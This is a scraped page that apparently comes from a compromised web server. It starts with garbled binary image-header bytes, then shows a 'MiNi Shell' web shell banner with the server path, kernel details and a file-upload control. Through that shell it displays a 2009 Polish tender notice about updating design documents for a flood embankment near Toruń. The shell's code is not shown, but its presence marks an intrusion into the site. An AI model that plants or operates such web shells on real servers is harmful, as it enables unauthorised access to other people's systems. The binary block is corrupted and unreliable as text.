JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/97314-N-2009.html

<p class="kh_header"><b>Włocławek: wykonanie aktualizacji dokumentacji projektowej
dla zadania:
Przebudowa wału przeciwpowodziowego Dolnej Niziny Toruńskiej w km 0+000 - 25+000, Etap l, gm. Zławieś Wielka, pow. Toruń.</b><br>
<b>Numer ogłoszenia: 97314 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorski Zarząd Melioracji i Urządzeń Wodnych , ul. Okrzei 74a, 86-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 2313676, faks 054 2313866.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie aktualizacji dokumentacji projektowej
dla zadania:
Przebudowa wału przeciwpowodziowego Dolnej Niziny Toruńskiej w km 0+000 - 25+000, Etap l, gm. Zławieś Wielka, pow. Toruń..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie aktualizacji dokumentacji projektowej dla zadania pn.; Przebudowa wału przeciwpowodziowego Dolnej Niziny Toruńskiej w km 0+000 - 25+000, Etap l, gm. Zławieś Wielka, pow. Toruń, w celu zwiększenia zabezpieczenia przeciwpowodziowego Dolnej Niziny Toruńskiej. Dla osiągnięcia planowanych celów należy uaktualnić dokumentację zaprojektowanej przebudowy istniejącego wału przeciwpowodziowego, co ma poprawić jego parametry techniczne oraz wzmocnić podłoże pod wałem.
Dokumentacja powinna zawiera ć wszelkie dane i informacje oraz spełniać wymogi formalne, dla inwestycji dofinansowanych ze środków unijnych w ramach Programu Rozwoju Obszarów wiejskich na lata 2007-2013, działanie : Poprawienie i rozwijanie
infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez gospodarowanie rolniczymi zasobami wodnymi.
Wykonawca  jednostka projektowa  przekaże zamawiającemu:
-	6 egz. projektu budowlanego,
-	4 egz. projektu wykonawczego,
-	3   egz.   materiałów  do   uzyskania   decyzji   lokalizacji   inwestycji   celu publicznego,
-	3 egz. raportu oddziaływania przedsięwzięcia na środowisko,
-	3 egz. oceny oddziaływania inwestycji na obszar  Natura 2000,
-	3 egz. wstępnego operatu wywłaszczeniowego,
-	3 egz. operatu dendrologicznego,
-	2 egz. specyfikacji technicznej wykonania i odbioru robót,
-	3 egz. instrukcji eksploatacji i konserwacji wału
-	2 egz. kosztorysu inwestorskiego i przedmiarów robót
-	 po 3 egzemplarze innych opracowań, których potrzeba sporządzenia,
pojawi się w procesie projektowania.
W ramach aktualizacji dokumentacji należy wykonać lub uzyskać:
-	mapę urządzeń i obszaru chronionego w skali 1:25000,
-	przygotowanie - aktualizację map sytuacyjno-wysokościowych niezbędnych do
wykonania zamówienia i uzyskania pozwoleń formalno-prawnych, w tym pozwolenia na budowę,
-	materiały do wniosku o uzyskanie decyzji lokalizacji inwestycji celu publicznego
według  wymogów  ustawy z dnia  03.10.2008  r.  o  udostępnieniu  informacji  o
środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko -Dz.U.  Nr 199, póz.  1227-, a następnie decyzję w terminie 3 miesięcy od podpisania umowy,
-	 decyzję o warunkach prowadzenia robót od Regionalnego Dyrektora Ochrony
Środowiska w Bydgoszczy,
-	aktualizację projektów budowlanych i wykonawczych,
-	aktualizację mapy stanu prawnego wraz z wypisami z rejestru gruntów, danych
dotyczących   właścicieli   gruntów,   na   których   zlokalizowana  jest   inwestycja   oraz właścicieli gruntów przyległych do inwestycji, a także zgód na stałe i czasowe zajęcie gruntów,
  -	uzupełnienie   badań   geotechnicznych   oraz   analizę   warunków  gruntowych   i geotechnicznych  w zakresie  niezbędnym  do wykonania zamówienia - według potrzeb,
-	aktualizację profilu podłużnego w skali 1:100   1000,
-	uzgodnienia wynikające z przepisów prawa budowlanego, prawa wodnego oraz
tematyki opracowania, w tym uzgodnienia z RZGW Gdańsk, Urzędem Gminy Zawieś Wielka, ZUD-em, właścicielami i użytkownikami mediów i instalacji,
-	 uzgodnienia rozwiązań projektowych z administratorem wału - Biurem Terenowym w Brodnicy, przy udziale OR w Toruniu,
-	aktualizację operatu dendrologicznego  na wycinkę drzew i krzewów i jego
uzgodnienie z Wojewódzkim Konserwatorem Przyrody w Bydgoszczy,
-	raport o wp ływie inwestycji na środowisko  -§ 3.1. pkt. 61   rozporządzenia Rady Ministrów z 9.11.2004 r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu o oddziaływaniu na środowisko, Dz. U. Nr 257, póz. 2573,
-	aktualizację oceny oddziaływania inwestycji na obszar  Natura 2000,
-	aktualizację oceny merytorycznej i uzasadnienie celowości inwestycji,
-	aktualizację informacji dotyczącej bezpieczeństwa i ochrony zdrowia na budowie,
-	aktualizację specyfikacji technicznej wykonania i odbioru robót -art. 31 PZP,
-	aktualizację instrukcji eksploatacji i konserwacji wału,
-	 aktualizację przedmiaru robót z podziałem na etapy i zakresy uzgodnione z
zamawiającym,
-	aktualizację   kosztorysu   inwestorskiego   zgodnie   z   rozporządzeniem   Min.
Infrastruktury  z  dnia   18.05.2004   r.   w  sprawie   określenia   metod   i   podstaw
sporządzania  kosztorysu  inwestorskiego,  obliczania  planowanych  kosztów prac
projektowych   oraz   planowanych   kosztów   robót   budowlanych   określonych   w
programie funkcjonalno-użytkowym  Dz. U. Nr. 130 z 2004 r. póz. 1389 z podziałem
na etapy jak w przedmiarze,
-	aktualizację wstępnego operatu wywłaszczeniowego uwzględniającego dokonane
dotychczas wykupy gruntów i zgodę od właścicieli gruntów pod wałem, właścicieli
dróg gruntów przyległych do wału i dróg, na stałe i czasowe zajęcie terenu w
rozumieniu prawa budowlanego, niezbędne do realizacji inwestycji,
-	aktualizację  innych  niezbędnych  załączników  i  opracowań,   których  potrzeba
pojawiła się w związku z uzgodnieniami i uwarunkowaniami wynikłymi w trakcie
opracowywania dokumentacji oraz w związku z obowiązującymi przepisami.
Powyższe opracowania -kompletne - tekst, mapy, rysunki załączone do projektu wykonawczego, przedmiary, kosztorys inwestorski, itp., Wykonawca przekaże również w formie zapisu elektronicznego w formatach powszechnie stosowanych, na płycie CD.
Wyjściowymi materiałami do aktualizacji projektu przebudowy wału są opracowania:
-	projekt techniczny pn. Przebudowa wału przeciwpowodziowego Dolnej Niziny
Toruńskiej w km 0+000 -25+000, etap l, gm. Zławieś Wielka, pow. Toruń wykonany
przez BSiPGWR  B l PROM EL Sp. z o.o. w Warszawie w 2006 r.
-	 Ocena stanu technicznego wału przeciwpowodziowego Dolnej Niziny Toruńskiej w
km 0+000 -25+000, wykonana prze Specjalistyczną Pracownię Projektową  WAGA-
BART w Warszawie w 2004 r.
Zamawiający posiada następujące aktualne decyzje dla w w zdania:
-	Decyzja o ustaleniu lokalizacji inwestycji celu publicznego o znaczeniu gminnym
znak:  PR7330-190-2.05.2006 z dnia  5.01.2006  r, wydana  przez Wójta Gminy
Zławieś Wielka,
-	 Decyzja o  środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia
znak: PR7624-14-4.2008 z dnia 8.09.2008 r., wydana przez Wójta Gminy Zławieś
Wielka,
-	Decyzja  pozwolenie wodno-prawne  znak:  W ŚSRRW-Ill-JK-6811-01-08  z dnia
23.09.2008 r., wydana przez Wojewodę Kujawsko-Pomorskiego.
Powyższe decyzje należy uaktualnić zgodnie z zapisami ustawy z dnia 3.10.2008 r. o
udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w
ochronie  środowiska oraz ocenach oddziaływania na środowisko Dz.U.Nr 199, póz.
1227..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości 
2.000,00 z ł ( słownie: dwa tysiące zł 00/100 ).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału wykonawców w postępowaniu:
W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy PZP oraz spełniają warunki określone w SIWZ, czyli tacy, którzy:
1)	 posiadaj ą uprawnienia do wykonywania określonej działalności lub czynności,
jeżeli     ustawy    nakładają    obowiązek    posiadania    takich     uprawnień,
udokumentowane odpisem z Krajowego Rejestru Sądowego lub ewidencji
działalności gospodarczej,
2)	 posiadaj ą niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią
pisemne   zobowiązanie   innych   podmiotów   do   udostępnienia   potencjału
technicznego i osób zdolnych do wykonania zamówienia,
3)	 dysponuj ą osobami zdolnymi do pełnienia obsługi prawnej niezbędnej przy
wykonywaniu czynności związanych z realizacją niniejszego zamówienia,
4)	 znajduj ą się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia,
5)	 nie podlegaj ą wykluczeniu z postępowania o udzielenie zamówienia ,art. 24
ust.1 i 2 ustawy PZP,
6)	 wykonali   z   należytą   starannością,   w   ostatnich   trzech   latach,   min.   3
zamówienia o przedmiocie, koszcie i złożoności porównywalnej z niniejszym
zamówieniem,   potwierdzone   referencjami,   a   jeżeli   okres   wykonywania
działalności jest krótszy - w tym okresie.
Oferta  musi  zawierać w szczególności  następujące  dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1)	 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają
wpisu lub zgłoszenia do ewidencji działalności, wystawione nie wcześniej niż 6
miesięcy przed upływem terminu składania ofert;
2)	oświadczenie potwierdzające spełnienie warunków udziału w postępowaniu
określonych w art. 22 ust. 1 ustawy PZP,
Do oferty Wykonawcy do łącza, oprócz dokumentów, o których mowa wyżej:
1)	Wykaz osób i podmiotów, które będą wykonywać zamówienie, wraz z danymi
na temat ich kwalifikacji, niezbędnych do wykonania zadania,
2)	 Wykaz wykonanych w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, opracowań o przedmiocie, koszcie i
złożoności porównywalnej z przedmiotowym zamówieniem,
3)	 Dokumenty potwierdzające, że prace wykazane w pkt. 2 zostały wykonane z
należyta starannością ,referencje, opinie zamawiających,
4)	 O świadczenie o zapoznaniu się z uwarunkowaniami w terenie, warunkami
przetargu określonymi w SIWZ i przyjęciu warunków do przestrzegania,
5)	 Aktualne o świadczenie o braku zaległości podatkowych oraz o opłacaniu
składek na ubezpieczenie społeczne,
 
6)	 Polis ę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest
ubezpieczony   od   odpowiedzialności   cywilnej   w   zakresie   prowadzonej
działalności,
7)	 O świadczenie  o  dysponowaniu  osobami  zdolnymi  do   pełnienia  obsługi
prawnej, niezbędnej przy wykonywaniu czynności związanych z realizacją
niniejszego zamówienia,
8)	Harmonogram wykonania prac projektowych,
9)	Zaakceptowany wzór umowy stanowiący załącznik nr 1 do SIWZ.
Dokumenty powinny by ć przedstawione w formie oryginałów albo kopii poświadczonych za zgodność z oryginałem przez upoważnion(ego)ych przedstawiciela)! Wykonawcy.
Ocena spełniania warunków udziału wykonawcy w postępowaniu zostanie dokonana: według formuły -spełnia - nie spełnia- tj. na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie warunków wymienionych w SIWZ.
Nie spełnienie chociażby jednego z w w warunków, skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy PZP..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta  musi  zawierać w szczególności  następujące  dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1)	 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają
wpisu lub zgłoszenia do ewidencji działalności, wystawione nie wcześniej niż 6
miesięcy przed upływem terminu składania ofert;
2)	oświadczenie potwierdzające spełnienie warunków udziału w postępowaniu
określonych w art. 22 ust. 1 ustawy PZP,
Do oferty Wykonawcy do łącza, oprócz dokumentów, o których mowa wyżej:
1)	Wykaz osób i podmiotów, które będą wykonywać zamówienie, wraz z danymi
na temat ich kwalifikacji, niezbędnych do wykonania zadania,
2)	 Wykaz wykonanych w ciągu ostatnich trzech lat, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, opracowań o przedmiocie, koszcie i
złożoności porównywalnej z przedmiotowym zamówieniem,
3)	 Dokumenty potwierdzające, że prace wykazane w pkt. 2 zostały wykonane z
należyta starannością (referencje, opinie zamawiających),
4)	 O świadczenie o zapoznaniu się z uwarunkowaniami w terenie, warunkami
przetargu określonymi w SIWZ i przyjęciu warunków do przestrzegania,
5)	 Aktualne o świadczenie o braku zaległości podatkowych oraz o opłacaniu
składek na ubezpieczenie społeczne,

6)	 Polis ę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest
ubezpieczony   od   odpowiedzialności   cywilnej   w   zakresie   prowadzonej
działalności,
7)	 O świadczenie  o  dysponowaniu  osobami  zdolnymi  do   pełnienia  obsługi
prawnej, niezbędnej przy wykonywaniu czynności związanych z realizacją
niniejszego zamówienia,
8)	Harmonogram wykonania prac projektowych,
9)	Zaakceptowany wzór umowy stanowiący załącznik nr 1 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kpzmiuw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko-Pomorski  Zarząd Melioracji i Urządzeń Wodnych z siedzibą we Włocławku, ul. Okrzei 74 A, tel/fax 054 231 36 76.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 09:00, miejsce: Kujawsko-Pomorski Zarząd Melioracji i Urządzeń Wodnych, 87-800
Włocławek,  ul. Okrzei 74 A l piętro - Sekretariat, pokój nr 34.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com